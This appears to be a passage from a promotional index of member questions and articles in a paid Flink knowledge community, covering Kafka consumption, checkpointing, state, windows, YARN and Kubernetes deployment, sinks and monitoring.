266. [Which user should Flink be started as — root or some other user?](https://t.zsxq.com/aAaqFYn)
267. [Can Flink read LZO files?](https://t.zsxq.com/2nUBIAI)
268. [How can data be scanned out of ES quickly? All our company's data lives in ES, and every scan is very slow — any good ideas?](https://t.zsxq.com/beIY7mY)
269. [If data should be partitioned by one field, say f0, and each partition processed with parallelism 1, how is that set up?](https://t.zsxq.com/fYnYrR7)
270. [Writing operators in Scala is faster, and in a process operator's onTimer a Scala ListBuffer makes emitting a top-3 easy. In Java, is the only option to read Flink's ListState with get() and put it into an ArrayList?](https://t.zsxq.com/nQFYrBm)
271. [Could you publish some Flink 1.9 dimension-table join examples, including async lookup and dimension-table caching?](https://t.zsxq.com/eyRRv7q)
272. [With the Flink Kafka source set to consume from the group offsets, on the first start the historical data in Kafka is skipped and consumption begins from current data; only the second start resumes from the group's offsets. Is there a way to make the first start consume Kafka's historical data?](https://t.zsxq.com/aMRzjMb)
273. [1. Processing offline data with Flink on a schedule, with a timestamp field, how do I compute the per-minute maximum, like a streaming window would? 2. To implement batch/stream unification myself, what is a good direction — e.g. letting stream processing reuse a batch operator?](https://t.zsxq.com/3ZjiEMv)
274. [How can streaming data be treated in batches in Flink? The stream is a custom source reading several Redis hash tables, and a notion of batches must be enforced](https://t.zsxq.com/AIYnEQN)
275. [Some say spawning multiple threads inside one task is not recommended — what is your view?](https://t.zsxq.com/yJuFEYb)
276. [We want a SQL query solution running on an HBase + ES architecture — can Flink SQL do it, or is there another solution or direction?](https://t.zsxq.com/3f6YBmu)
277. [Urgently building our first project that uses Flink: for Flink 1.8.1 writing into ES7, do we use the bundled sink? Any example to share? Everything I find targets ES6. I know this is not a great way to ask, but it is urgent and my own attempts have failed. T T](https://t.zsxq.com/jIAqVnm)
278. [After manually stopping a job, with the most recent savepoint saved, how do I use the last checkpoint when the job is restarted?](https://t.zsxq.com/2fAiuzf)
279. [Running batch data through the streaming environment (in order to use windows): how can the job determine that the batch file has been fully read, so it can finish processing and shut down? And if it cannot, how else can window semantics be achieved in batch?](https://t.zsxq.com/BIiImQN)
280. [If deduplication is restricted to within a window and the data volume is fairly large, what works well?](https://t.zsxq.com/Mjyzj66)
281. [Has an article on end-to-end exactly-once been published?](https://t.zsxq.com/yv7Ujme)
282. [How can streams be added dynamically? Removed dynamically? How can parameters be modified dynamically (broadcast)?](https://t.zsxq.com/IqNZFey)
283. [A custom source implements a notion of batches; Flink registers one batch of the stream as several tables and joins them — is there a way to know when the SQL for a batch has finished computing?](https://t.zsxq.com/r7AqvBq)
284. [Compiling Flink errors out — have you hit this, and what causes it?](https://t.zsxq.com/rvJiyf6)
285. [Flink on YARN with ZooKeeper for HA: inspecting the checkpoint info in ZK, why are the entries IPs rather than paths? How do I get the actual path? The REST API is ruled out, since it disappears once the job closes, and the history server is ruled out too — it is clunky](https://t.zsxq.com/nufIaey)
286. [Using StreamingFileSink to write Kafka data into HDFS: when the Flink program is shut down outright and started again, the sink begins writing from part-0-0 again, which clashes with what was written before, and that file then stays stuck in the in-progress state.](https://t.zsxq.com/Fy3RfE6)
287. [A real-time analysis requirement with modest volume must sink into MySQL with updates. My current plan: for each record, first read MySQL — update if the row exists, otherwise insert — which means two round trips per record written. Is there a better way, or does Flink have a built-in API for this "update-or-insert" style operation?](https://t.zsxq.com/myNF2zj)
288. [With checkpointing configured, the JobManager periodically deletes checkpoint data but the TaskManager does not — why is that?](https://t.zsxq.com/ZFiMzrF)
289. [With RocksDB as the state backend, where can RocksDB's I/O and memory metrics be monitored?](https://t.zsxq.com/z3RzJUV)
290. [Could you write an article on state — its use cases and its usage? I don't know this area well](https://t.zsxq.com/AUjE2ZR)
291. [How does distinct count in the Flink 1.9 SQL API implement efficient streaming deduplication?](https://t.zsxq.com/aaynii6)
292. [Inside an operator, how can the operator's parallelism and the index of the current subtask be obtained?](https://t.zsxq.com/mmEyVJA)
293. [Is there a Flink 1.9 + Hive demo — Kafka to Hive?](https://t.zsxq.com/fIqNF6y)
294. [Could you explain Apache Calcite?](https://t.zsxq.com/ne6UZrB)
295. [For window operations like this one, how is the data's state preserved after an abnormal restart of the program?](https://t.zsxq.com/VbUVFMr)
296. [Using the Kafka source, converting the incoming JSON string into a custom type with gson.fromJson(jsonstr, classOf[Entity]) throws the error in the picture — printing without converting works fine; I don't know how to solve it](https://t.zsxq.com/EMZFyZz)
297. [A DataStream reads database tables for a multi-table join — can a time window be set so it refreshes once a day? The streaming program keeps pulling data and the database cannot take it](https://t.zsxq.com/IEieI6a)
298. [Does Flink support wildcard reads over multiple paths? For example, the path s3n://pekdc2-deeplink-01/Kinesis/firehose/2019/07/03/*/* is not found with wildcards — is special configuration needed?](https://t.zsxq.com/IemmiY7)
299. [Flink deployed on YARN: trimming the container's URL lands on the Hadoop YARN home page. How can the Hadoop YARN home page be blocked? Exposing that address lets users see all jobs, which is dangerous](https://t.zsxq.com/QvZFUNN)
300. [How do I write a Flink SQL stream that outputs the current time every second?](https://t.zsxq.com/2JiubeM)
301. [(That was in order to build a data stream through SQL, haha.) Another question: with a global processing-time window, inside a processAllWindowFunction how do I know each incoming element's processing time, and on what basis did the element enter this window?](https://t.zsxq.com/bQ33BmM)
302. [How can the data reported by one device be stored into the same HDFS file?](https://t.zsxq.com/rB6ybYF)
303. [I wrote a test Kafka producer with a very simple format (key, i): the key is a fixed string and i auto-increments. On the Flink consumer side I enabled checkpointing with exactly-once, and the program simply reads Kafka and prints. If I kill the program when I see (key, 10) printed and restart it, it should resume from the last offset, i.e. (key, 11), but I sometimes see it start from around (key, 9) and count up — isn't that duplicate consumption, and how is exactly-once supposed to be guaranteed?](https://t.zsxq.com/MVfeeiu)
304. [Suppose a source keeps producing data and Flink's backpressure reaches the source because Flink cannot process as fast as the source produces. Question 1: what does the Flink source do then — drop what it cannot process, or buffer it? Question 2: if it buffers, how does the buffering work?](https://t.zsxq.com/meqzJme)
305. [When one stream has multiple sinks, do the sinks run serially or in parallel?](https://t.zsxq.com/2fEeMny)
306. [I want a window on a stream that triggers either at a fixed time interval or when the element count reaches a preset threshold — whichever comes first. Apart from overriding a trigger, is there another way?](https://t.zsxq.com/NJY76uf)
307. [With RocksDB as the state backend, using SQL group by on a time field to avoid windows, the old data is never cleaned up and disk usage grows very large. For this non-programmatic style, is there a way to set a TTL and clean up old data?](https://t.zsxq.com/A6UN7eE)
308. [Why do windows of both the form TimeWindow{start=362160000, end=362220000} and TimeWindow{start=1568025300000, end=1568025360000} appear? I use one-minute TumblingEventTimeWindows throughout — why the two different shapes?](https://t.zsxq.com/a2fUnEM)
309. [Say I count the day's orders, but some data arrives a day late: 2019-08-01 should have 1000 orders, yet a record of 100 is late and arrives on 2019-08-02, so 08-01 is counted as 900. How do I correct that wrong result afterwards?](https://t.zsxq.com/Y3jqjuj)
310. [Does Flink in streaming mode use only on-heap memory?](https://t.zsxq.com/zJaMNne)
311. [If a cluster migration is on the table, can the state be migrated?](https://t.zsxq.com/EmMrvVb)
312. [Our business reports values as (time, accumulated value), and we need (time, current value), where current value = accumulated value minus the previous record's accumulated value. How can Flink do this? We considered the state mechanism, but if the service crashes, the state is wiped](https://t.zsxq.com/6EUFeqr)
313. [Flink on K8s versus Flink on YARN — what are the pros and cons of each, and which is more suitable for production?](https://t.zsxq.com/y7U7Mzf)
314. [Is there a connector linking DataHub and Flink?](https://t.zsxq.com/zVNbaYn)
315. [If the single-point ResourceManager goes down, what impact does it have on jobs?](https://t.zsxq.com/FQRNJ2j)
316. [Flink watches a binlog, joins it with a dimension table, and sinks to the final MySQL table. Do the insert, update, and delete operations on the final table need different sinks?](https://t.zsxq.com/rnemUN3)
317. [When exactly are windows merged? For example, when data enters WindowOperator's processElement — if it is not a session window, does window merging happen at all?](https://t.zsxq.com/JaaQFqB)
318. [Can one stream in Flink take part in several computations and be output in several places? Do they affect each other?](https://t.zsxq.com/AqNFM33)
319. [keyBy is defined as splitting a stream into disjoint partitions, each containing elements with the same key. What I don't understand: how is the number of partitions set — by setting this operator's parallelism? And what is the relationship between the partition count and the slot count?](https://t.zsxq.com/nUzbiYj)
320. [Dynamic CEP patterns — could you go into detail? Didi's design has not been published, and the screenshots you posted are based on 1.7. Any thoughts of your own would be welcome too — thanks](https://t.zsxq.com/66URfQb)
321. [Question 1: with a long-running session started via ./bin/yarn-session.sh -n 10 -s 3 -d, the allocated resources come from the YARN queue; when submitting with flink run xx.jar, how do the other machines obtain the runtime environment Flink needs, given that only one machine in the cluster has the Flink distribution?](https://t.zsxq.com/maEQ3NR)
322. [How are memory isolation and CPU isolation between slots implemented in a Flink TaskManager? What is the point of Flink's slot concept — why not do it like a Spark executor, with no internal isolation?](https://t.zsxq.com/YjEYjQz)
323. [When Spark integrates with Kafka in direct mode, one Spark partition corresponds to one partition of a Kafka topic. When Flink integrates with Kafka, how does it consume the data — say a topic has 5 partitions?](https://t.zsxq.com/nuzvVzZ)
324. [For jobs executed via ./bin/flink run -m yarn-cluster, the job's own logs (printed with slf4j via logger.info) cannot be seen through the yarn application logs — only the cluster's own logs appear. Where are they stored, or is it a problem with how I package the jar?](https://t.zsxq.com/27u3ZZf)
325. [In an IoT platform, each key's data must be checked against per-key limit values configured in a real-time database. Loading the limits into state risks memory overflow, since the key count is huge (~300 million); reading the limit from the database while processing adds network I/O and may hurt real-time performance. How should this be handled? Thanks](https://t.zsxq.com/miuzFY3)
326. [If one Flink program has several window operations, must timestamps and watermarks be assigned for each window? And must the event time already exist as a field in the source data?](https://t.zsxq.com/amURvZR)
327. [Any material on Flink 1.9's newly supported DDL for connecting Kafka and writing into HBase? Our company wants to gradually turn the offline warehouse into a real-time one, and writing SQL is the quicker on-ramp for us, so I am looking for material on this to study](https://t.zsxq.com/eqFuBYz)
328. [Flink 1.9 type-conversion mismatch: the previously used Type is deprecated in favor of the DataTypes types, but the schema/TypeInformation from the old Type-based methods no longer matches the return values of DataTypes — how should this be adapted?](https://t.zsxq.com/yVvR3V3)
329. [In Flink, can a single bad record take down the whole job? Is there a way (other than catching the exception) to just log the bad record and keep processing the data that follows? I have skimmed some of the fault-tolerance handling — after the program dies, restart and pull data from the checkpoint — but if the record itself is the problem (especially in production, where the job simply dies, with real impact), how can that problem record be filtered out (exception catching being the last resort)?](https://t.zsxq.com/6AIQnEi)
330. [In a daily-report job using RabbitMQ as the data source, why do the RabbitMQ messages stay in the unacked state? A window computation triggers every minute and evicts the computed elements. In the test environment all the data acks, but in production nothing does, and there are no errors — where might the problem be?](https://t.zsxq.com/RBmi2vB)
331. [Our current data flow is Kafka source, ETL, Redis sink. Can checkpointing guarantee end-to-end semantics in this setup?](https://t.zsxq.com/fuNfuBi)
332. [1. When submitting a Flink job through yarn-session, which of flink-core, flink-clients, flink-scala, flink-streaming-scala, scala-library, flink-connector-kafka-0.10 should go in provided scope and which in compile scope, to be correct and avoid dependency conflicts? 2. What exactly does flink-dist_2.11-1.8.0.jar contain? (Its packaging differs from Spring Boot's, so the jar dependencies cannot be seen clearly)](https://t.zsxq.com/mIeMzvf)
333. [With count windows in Flink there is this problem: some records at the tail never reach the count, so the window never fires. I saw the idea of combining a time window with a count window](https://t.zsxq.com/AQzj6Qv)
334. [In stream processing, after registering a stream as a Table, does the stream's historical data stay in the Table forever? Why does previously processed data get executed again every time new data arrives?](https://t.zsxq.com/VvR3Bai)
335. [available is changing data: besides the newest data being inserted into the database, previously processed data was executed again several times](https://t.zsxq.com/jMfyNZv)
336. [I have been studying Flink broadcast variables for two days and found a difference: in a DataSet, the broadcast data set is fetched at the same memory address (one machine maintains one broadcast data set), whereas in a DataStream each task seems to maintain its own copy (possibly my usage is wrong). So, can a broadcast variable in a DataStream be shared one-copy-per-machine, as in a DataSet?](https://t.zsxq.com/m6Yrv7Q)
337. [With checkpointing enabled and the program killed several times with yarn commands, the checkpoint directory contains multiple job ids. When resources are allocated and the program is started again, how does it find the directory of the previous job id rather than some other job id's directory? Is the last one used by default, or must a specific job id be given?](https://t.zsxq.com/nqzZrbq)
338. [Following up on yesterday's duplicate-insert problem: when the incoming Kafka stream is registered as a Table with registerDataStream and used in a join, printing the table's length shows that data keeps being appended to the table. How can records be processed one at a time without accumulating?](https://t.zsxq.com/RNzfQ7e)
339. [Does Flink 1.9 SQL have something like partitioned-table handling? Our business has one source whose data must be computed separately over 5, 10, and 15 minutes.](https://t.zsxq.com/AqRvNNj)
340. [I just set up a server, and when running the basic startup commands the TaskManager did not start, so the web page shows three zeros. I checked the logs and there is no error — do you know what the problem might be?](https://t.zsxq.com/q3feIuv)
341. [I defined a Sink extends RichSinkFunction with a field private transient Object lock. Initializing it inline — private transient Object lock = new Object(); — does not work: using lock in invoke gives a null pointer. Initializing lock in the custom sink's constructor fails too, but initializing it in the open method works. Why? Can you explain the execution model? And if one slot runs 5 sink instances, are 5 sink objects created, or 1?](https://t.zsxq.com/EIiyjeU)
342. [How do you estimate the number of Kafka brokers?](https://t.zsxq.com/aMNnIy3)
343. [How can Flink on YARN be debugged remotely?](https://t.zsxq.com/BU7iqbi)
344. [A current requirement: source data dataA, dataB, dataC arrives on three Kafka topics and must be merged, but there are a few problems I cannot solve. dataA="id:10001,info:***,date:2019-08-01 12:23:33,entry1:1,entryInfo1:***", dataB="id:10001,org:***,entry:1", dataC="id:10001,location:***". (1) How do I merge the three streams? (2) dataA carries a time, but dataB and dataC have no timestamp — how do I solve event time and late, out-of-order data? Please take a look, thanks](https://t.zsxq.com/F6U7YbY)
345. [Flink reads JSON data from Kafka; after deserialization the Chinese parts become strings of question marks. What do I do to make the Chinese come through correctly?](https://t.zsxq.com/JmIqfaE)
346. [I have several Flink programs (independent jars) that, for online business analysis, all use the same batch of MySQL configuration data (5000+ rows). The current implementation has each program independently load this configuration into memory for quick access, but it feels wasteful of resources and structurally inelegant — is there another solution for this kind of situation? Thanks](https://t.zsxq.com/3BMZfAM)
347. [RocksDBStateBackend or FsStateBackend for Flink checkpoints? Our jobs currently get stuck after running for a while.](https://t.zsxq.com/RFMjYZn)
348. [What problems remain with high availability and scaling for Flink on K8s?](https://t.zsxq.com/uVv7uJU)
349. [A question: Kafka's 4 partitions currently produce 4000–5000 log records per second, but on the Flink consumer side I opened only 4 slots for receiving; they only receive, split, and store, and now there is lag. I cannot tell whether my splitting is slow or Flink's intake from Kafka is slow — the Flink UI shows high backpressure on these two](https://t.zsxq.com/zFq3fqb)
350. [In Flink cluster mode, can a specific node be designated to execute a task?](https://t.zsxq.com/NbaMjem)
+ [When is an AggregateFunction's merge method actually used? Answers online say it merges the same key, but identical keys should be hashed to the same task — I don't quite follow this](https://t.zsxq.com/VnEim6m)
+ [How would Flink solve this? 1. eventA initiates an event and eventB responds to it; compute the response success rate per minute. eventA and eventB are linked by the same commitId; eventA usually reaches Flink earlier than eventB, though eventB may also arrive first. Requirement: if eventA has five records A, B, C, D, E and eventB has five records A', B', C', X', Y', the success rate is 3/5. 2. Also compute eventC's success rate (status 0 or 1) per minute; its logs are reported repeatedly, and only the record with the earliest eventTime counts — whatever was counted in one minute is not counted again in the next](https://t.zsxq.com/eMnMrRJ)
+ [Could you systematically explain the HA designs and source code for YARN, K8s, and standalone in the current Flink version?](https://t.zsxq.com/EamqrFQ)
+ [How can a job be submitted in yarn-cluster mode through the Java API?](https://t.zsxq.com/vR76amq)
+ [Has anyone hit stream-corruption problems? I don't know where to start solving it](https://t.zsxq.com/6iMvjmq)
+ [Can the cause of the anomaly be read from this log? I checked Kafka, YARN, and ZooKeeper — none of the three components shows anything abnormal](https://t.zsxq.com/uByFUrb)
+ [Why does Flink maintain two communication frameworks internally — Akka between the client and the JobManager and between the JobManager and the TaskManagers, but Netty between TaskManagers?](https://t.zsxq.com/yvBiImq)
+ [A small question: in Flink's wordcount, when output goes to the console, what does the number followed by > in front of each line mean?](https://t.zsxq.com/yzzBMji)
+ [Reading from topicA, transforming, and writing into topicB with checkpointing enabled: the job runs normally after starting and the new topic receives data, but when I check the lag on topicA with the script shipped with the Kafka client, it says the groupid does not exist](https://t.zsxq.com/MNFUVnE)
+ [After splitting a stream in Flink and running window computations on each branch, how do I gather the results of the several windows into one sink that outputs periodically? I want several real-time metrics from different streams — e.g. computed every minute (the metrics are spread over different streams) — stored as one tuple row in MySQL](https://t.zsxq.com/mUfm2zF)
+ [How does Flink output finally end up on a live data dashboard?](https://t.zsxq.com/nimeA66)
+ [Why does data of different keys enter the same AggregateFunction after my keyBy — or do different keys use the same AggregateFunction instance? After I assign a value to an object in the AggregateFunction, I find other keys' data overwrites the earlier data — what is going on?](https://t.zsxq.com/IMzBUFA)
+ [How can a window's computed result be aggregated together with the previous results?](https://t.zsxq.com/yFI2FYv)
+ [How should Flink-on-YARN jobs be monitored? The bundled InfluxDB metrics reporter seems unable to collect metrics from Flink on YARN](https://t.zsxq.com/ZZ3FmqF)
+ [Flink 1.9.0 consuming Kafka 0.10.1.1 data: the UI monitoring shows some partitions' current offset and commit offset as negative numbers that never change while the program runs — what is going on?](https://t.zsxq.com/QvRNjiU)
+ [Flink 1.9 with RANK() reports org.apache.flink.table.api.TableException: RANK() on streaming table is not supported currently](https://t.zsxq.com/Y7MBaQb)
+ [Can a Flink job switch the Kafka topic of its source dynamically, without restarting the job?](https://t.zsxq.com/rzVjMjM)
+ [1. What distinguishes keyed state from operator state (whether a shuffle happened?) 2. What is the CheckpointedFunction interface for? 3. When is its snapshotState method called?](https://t.zsxq.com/ZVnEyne)
+ [How do you all collect logs? The TaskManager seems to print different jobs' logs mixed together — is there a way to print them separately?](https://t.zsxq.com/AayjeiM)
+ [A recent requirement: count today's cumulative online users with deduplication, showing a result every 5 seconds — how should this be done?](https://t.zsxq.com/IuJ2FYR)
+ [A problem with Flink consuming Kafka. We use Aliyun Kafka, where consumers can be requested. Under the same topic A-test, consuming with consumer group A1, the two programs see very different data volumes at the source. Figure 1 consumes Kafka and writes into another Kafka topic — it is known to see only 100 records; figure 2 consumes Kafka and writes into HDFS. Both consume from the same starting offsets (the offsets were reset to the beginning after consuming); consuming by time, or with a from-the-beginning strategy, still yields only 100 records; I later switched off committing the Kafka offsets to checkpoints, and it was still 100. Very strange — should this problem be approached from the state side?](https://t.zsxq.com/eqBUZFm)
+ [Any recommended Grafana dashboards? We currently collect metrics with the Prometheus pushgateway reporter, but which metrics deserve close attention is still unclear to me](https://t.zsxq.com/EYz7iMV)
+ [On YARN: 1. does submitting in session mode mean multiple Flink jobs are managed by the same JobManager? 2. does per-job mode start a separate JobManager for each job?](https://t.zsxq.com/u3vVV3b)
+ [Have you used Lettuce to connect to a Redis cluster inside Flink? I get an error here: Cannot retrieve initial cluster partitions from initial URIs](https://t.zsxq.com/VNnEQJ6)
+ [Hi zhisheng — when using a Flink sliding window, a large amount of content is written to Redis every 10 minutes, which affects online performance. Is there a way to control the speed of the Redis writes?](https://t.zsxq.com/62ZZJmi)
+ [Flink standalone mode, started with flink run -c ClassName jar: how can the slots be distributed evenly? Currently one machine's slots keep being used first, and once there are many jobs the task jobs get killed; the error is in figure 2](https://t.zsxq.com/2zjqVnE)
+ [Hi zhisheng — standalone and YARN clusters both rely on SSH for communication between the master and the workers. Is there a setup that does not depend on SSH?](https://t.zsxq.com/qzrvbaQ)
+ [In the official docs, which scenarios do these two kinds of periodic watermark generation fit, respectively?](https://t.zsxq.com/2fUjAQz)
+ [For periodic watermarks generated on a timer — ExecutionConfig.setAutoWatermarkInterval(…) — how is that interval usually estimated?](https://t.zsxq.com/7IEAyV3)
+ [Is it possible to obtain the time Flink takes to allocate resources?](https://t.zsxq.com/YjqRBq3)
+ [Producing data from Flink into Kafka sometimes errors with: This server does not host this topic-partition](https://t.zsxq.com/vJyJiMJ)
+ [Flink started in YARN mode, with the log4j.properties configuration shown in the picture: the TaskManager page started by YARN shows the log output on stdout, but no log file is ever created in the configured log directory — locally the log files are written](https://t.zsxq.com/N3ZrZbQ)
+ [A question about flink2hbase: how can tables be created per day, based on an HBase date field? I wrote a custom HBase sink and create the table inside the invoke method based on the record's time, but that introduces a problem: every record has to check whether the table exists, generating a large number of RPC requests. Is there a good way around this?](https://t.zsxq.com/3rNBubU)
+ [Hi — do you have material on TMs, slots, memory, thread counts, process counts, CPU, and scheduling? For example, how many threads a slot starts, why, how they are started, and how tasks are scheduled. I could not find what I wanted online, the books are not detailed enough, and the source code is still hard for me to read, so I would like some material first](https://t.zsxq.com/buBIAMf)
+ [Can a single FlinkKafkaConsumer read multiple Kafka topics whose processing logic is all the same, finally writing each topic's data into its corresponding ES table? How would that be implemented?](https://t.zsxq.com/EY37aEm)
+ [Could you describe how events are kept in memory in a window — say a tumbling window — after several events enter it? Do they become one state? Or do several events become one state? What is the relationship between events and state? Once event time has passed, how are events cleaned from the window? And with RocksDBStateBackend and incremental checkpoints, how are saved expired events cleaned up?](https://t.zsxq.com/3vzzj62)
+ [How is Flink monitoring done — e.g. alerting when a job dies? We currently plan to use Prometheus for monitoring, but the reported metrics do not quite match my needs. Our jobs are started with yarn-session, so one JobManager manages several jobs. I am still new to Prometheus and may have missed some reported metrics — any suggestions?](https://t.zsxq.com/vJyRnY7)
+ [Can ProcessTime and EventTime be used together? When a job fails on an exception and a restart strategy is configured, does the restart resume from the most recent checkpoint? We hit a database primary-key conflict; the Kafka source had only one message with that key, and the logs showed the Redis connection pool threw an exception (Redis was restarting at the time), which failed the job and triggered a retry; ProcessTime was in use](https://t.zsxq.com/BuZJaUb)
+ [In a custom flink-kafka deserializer, what is the better way to handle bad data? I found an earlier question here on this: if the exception is caught with try-catch, is it better to rethrow it or to return null?](https://t.zsxq.com/u3niYni)
+ [We compare upstream and downstream data with Flink and have hit a performance bottleneck: one node can currently consume at most 50 records. The TaskManager's GC logs show a maximum heap of 2.7 GB but a young generation of at most 300 MB. Can Flink's JVM parameters be set in the Flink-on-YARN startup mode?](https://t.zsxq.com/rvJYBuB)
+ [A question of principle: what is the essential difference between side output and simply processing one stream in two ways? I tried it — writing one stream both to a cache and into a database — and both sides got the full data](https://t.zsxq.com/Ee27i6a)
+ [How do I define a Flink window that processes 500 records per second: 1. with 10,000 records in Kafka, still process 500 per second; 2. with 20 records in Kafka, process once every second?](https://t.zsxq.com/u7YbyFe)
+ [Can savepoints be saved from the web UI, or can jobs only be started from a savepoint there?](https://t.zsxq.com/YfAqFUj)
+ [Can consumption be limited to certain Kafka partitions, without pulling messages from the others? We have many scenarios now where a topic has over a hundred partitions but I only need the data of a few of them](https://t.zsxq.com/AUfEAQB)
+ [I want to filter the data read from Kafka, with the filter conditions fetched from Redis (they relate to user configuration, so they must be refreshed periodically), but it feels clumsy — is there a better design? Since no Redis source is provided, I read the Redis data with the Jedis client and get no data. How is Flink code usually debugged while writing it?](https://t.zsxq.com/qr7UzjM)
+ [Flink with RocksDB keeps state checkpoints on HDFS; some jobs' state is tiny, but an HDFS file takes at least 128 MB, so disk space fills up quickly — is there a configuration to clean checkpoints up automatically?](https://t.zsxq.com/Ufqj2ZR)
+ [This is a real-time deduplication question. For example, when an order transaction happens, the business middle platform sends that order message to Kafka, Flink consumes it, and the total amount is computed. If the middle platform mistakenly sends the same order over several times (same order id), the statistic is accumulated several times, so the computed total exceeds the actual transaction amount. I need to deduplicate in the custom source using operator state, but operator state is bound to each source instance, so duplicate orders may be sent to different source instances, whose state then may not contain the order id already recorded the last time — and that duplicate order's amount gets counted into the final result](https://t.zsxq.com/RzB6E6A)
+ [In a two-stream join, how do I make sure the data coming from both sides corresponds? For example, order messages and inventory messages: logically, when an order happens the inventory also changes, and both topics each send me a message at the same time; I join the two messages by order id when they arrive. The problem: if the inventory message is delayed by 5 or 10 seconds, the order message finds no inventory message to join when it arrives — what then?](https://t.zsxq.com/nunynmI)
+ [I have a comparison program built on Flink, with flink-kafka as the data source. The business data is split into upstream and downstream and must be grouped by a field, with the same key's upstream and downstream data compared together. Since the two sides arrive at different times, I use an iterating window of 5 minutes for the comparison, with at most 3 iterations; the state backend is FsStateBackend. Monitoring shows that once the program exceeds 20k records per minute, it stops consuming data — the web UI looks normal, and the JobManager and TaskManager stdout show no error logs, but the program simply stops consuming.](https://t.zsxq.com/nmeE2Fm)
+ [About the capacity setting in async I/O: does it mean the number of concurrent requests, or something else? If I set 10 cores per TaskManager with 10 TaskManagers in total, can that number only be set to 100?](https://t.zsxq.com/vjimeiI)
+ [A performance question, in case there is relevant experience: one job reads a topic from Kafka, splits the stream, and after splitting with side output processes the branches directly — is the performance impact large? Say there are over a hundred subtasks after the split. Are there other good ways to split a stream?](https://t.zsxq.com/mEeUrZB)
+ [A production job throws the following exception yet keeps running normally — how should this be investigated? Any leads would help](https://t.zsxq.com/Eayzr3R)

And so on — there are many, many more; my hand is tired from all the copy-pasting 😂 The planet also promptly shares the latest Flink material (data sets, videos, PPTs, excellent blog posts — continuously updated and guaranteed the most complete on the whole web, because I know there is still not much Flink material around).

[Some of my own thoughts and advice on learning Flink](https://t.zsxq.com/AybAimM)

[The most complete Flink material on the web, continuously updated — click to get it](https://t.zsxq.com/iaEiyB2)

One more thing planet members have asked of me: to share, from time to time, hands-on experience from Flink projects I have run into — problems hit in production projects and how they were solved!
1. [How to view your job's execution plan and obtain the execution plan graph](https://t.zsxq.com/Zz3ny3V)
2. [What to do when real-time alerting meets a Kafka backlog of tens of millions of records?](https://t.zsxq.com/AIAQrnq)
3. [How to compare two values in a data stream — several solutions](https://t.zsxq.com/QnYjy7M)
4. [The Kafka article series](https://t.zsxq.com/6Q3vN3b)
5. [Flink environment deployment, application configuration, and running applications](https://t.zsxq.com/iiYfMBe)
6. [This is what a monitoring platform's architecture should look like](https://t.zsxq.com/yfYrvFA)
7. [Outline of the column series "The Big-Data Blockbuster — the Real-Time Computing Framework Flink"](https://t.zsxq.com/beu7Mvj)
8. [The paid Chat article of "The Big-Data Blockbuster — the Real-Time Computing Framework Flink"](https://t.zsxq.com/UvrRNJM)
9. [How does Apache Flink manage memory so well?](https://t.zsxq.com/zjQvjeM)
10. [Flink On K8s](https://t.zsxq.com/eYNBaAa)
11. [Flink-metrics-core](https://t.zsxq.com/Mnm2nI6)
12. [Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6)
13. [Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6)
14. [Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6)
15. [Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6)
16. [Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6)
17. [Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6)
18. [Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6)
19. [Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6)
20. [Flink annotations — source-code analysis](https://t.zsxq.com/f6eAu3J)
21. [Building a Flink monitoring platform with InfluxDB and Grafana](https://t.zsxq.com/yVnaYR7)
22. [One article to understand Flink's internal exactly-once and at-least-once](https://t.zsxq.com/UVfqfae)
23. [One article to thoroughly understand the big-data real-time computing framework Flink](https://t.zsxq.com/eM3ZRf2)

Of course, besides Flink-related updates I also post some general big-data material — I personally was not a big-data developer before, so I am cramming knowledge too! In short, I hope everyone who joins makes progress together!

1. [Java core knowledge points.pdf](https://t.zsxq.com/7I6Iyrf)
2. [If I were the interviewer, these are the questions I would ask you](https://t.zsxq.com/myJYZRF)
3. [Kafka article series and learning videos](https://t.zsxq.com/iUZnamE)
4. ["Redefining Flink", issue 2, PDF](https://t.zsxq.com/r7eIeyJ)
5. [GitChat Flink article Q&A notes](https://t.zsxq.com/ZjiYrVr)
6. [The knowledge points to master in a Java concurrency course](https://t.zsxq.com/QZVJyz7)
7. [Lightweight Asynchronous Snapshots for Distributed Dataflows](https://t.zsxq.com/VVN7YB2)
8. [Apache Flink™ - Stream and Batch Processing in a Single Engine](https://t.zsxq.com/VVN7YB2)
9. [Flink state management and fault-tolerance mechanisms](https://t.zsxq.com/NjAQFi2)
10. [Flink's unified stream/batch architecture and its practice at Alibaba](https://t.zsxq.com/MvfUvzN)
11. [Flink Checkpoint — lightweight distributed snapshots](https://t.zsxq.com/QVFqjea)
12. [Flink's unified stream/batch architecture and its practice at Alibaba](https://t.zsxq.com/MvfUvzN)
13. [Stream Processing with Apache Flink, PDF](https://t.zsxq.com/N37mUzB)
14. [A monitoring-platform practice combining Flink with machine-learning algorithms](https://t.zsxq.com/m6EAaQ3)
15. ["The Big-Data Blockbuster — Real-Time Computing with Flink", preparatory chapter — an introduction to real-time big-data computing and its common scenarios, PDF and video](https://t.zsxq.com/emMBaQN)
16. ["The Big-Data Blockbuster — Real-Time Computing with Flink", opening words, PDF and video](https://t.zsxq.com/fqfuVRR)
17. [Four Flink books](https://t.zsxq.com/rVBQFI6)
18. [Papers on stream-processing systems](https://t.zsxq.com/rVBQFI6)
19. [Apache Flink 1.9 features explained](https://t.zsxq.com/FyzvRne)
20. [Building a machine-learning ecosystem on the Flink Table API](https://t.zsxq.com/FyzvRne)
21. [A big-data platform based on Flink on Kubernetes](https://t.zsxq.com/FyzvRne)
22. [A high-performance machine-learning algorithm library based on Apache Flink](https://t.zsxq.com/FyzvRne)
23. [Apache Flink applications and practice at Kuaishou](https://t.zsxq.com/FyzvRne)
24. [Apache Flink 1.9 compatibility with Hive](https://t.zsxq.com/FyzvRne)
25. [Building a machine-learning ecosystem on the Flink Table API](https://t.zsxq.com/FyzvRne)
26. [Papers on stream-processing systems](https://t.zsxq.com/rVBQFI6)
0
CodingDocs/springboot-guide
Spring Boot 2.0+, from getting started to hands-on practice!
asynchronous dubbo mybatis rabbitmq spring-data-jpa springboot
